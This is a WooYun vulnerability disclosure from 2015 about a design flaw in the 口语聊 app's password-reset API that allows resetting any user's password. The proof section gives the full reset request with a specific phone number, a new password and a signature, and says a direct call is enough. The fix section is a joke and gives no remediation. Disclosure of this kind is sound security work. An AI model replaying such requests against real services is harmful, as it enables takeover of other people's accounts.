当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156268

漏洞标题:口语聊某功能设计缺陷可重置任意用户密码

相关厂商:瓜蕉科技

漏洞作者: 杭州PHP码农

提交时间:2015-11-28 23:23

修复时间:2016-01-12 23:24

公开时间:2016-01-12 23:24

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

拉钩地址:http://www.lagou.com/gongsi/100827.html

QQ截图20151127113524.png


APP名称:口语聊
APP地址:http://www.kouyuliao.com/
APP漏洞简介:
设计缺陷导致可以重置任意手机号密码。

漏洞证明:

接口地址:http://www.kouyuliao.com/v2/users/passwd
数据参数:
sign_type=MD5&timestamp=1448593982&international_code=86&mobile=13381211608&passwd=123456789&sign=d9312b6e599633f9c47cd29838f494e8
使用说明:直接访问接口地址就可以修改对应的mobile字段中的手机号的密码为passwd字段中的值。
测试修改密码提示成功:

clipboard.png


测试登录提示成功:
登录接口地址: http://www.kouyuliao.com/v2/users/passwd

clipboard2.png


修复方案:

不要为难程序员。他们也不容易。

版权声明:转载请注明来源 杭州PHP码农@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评价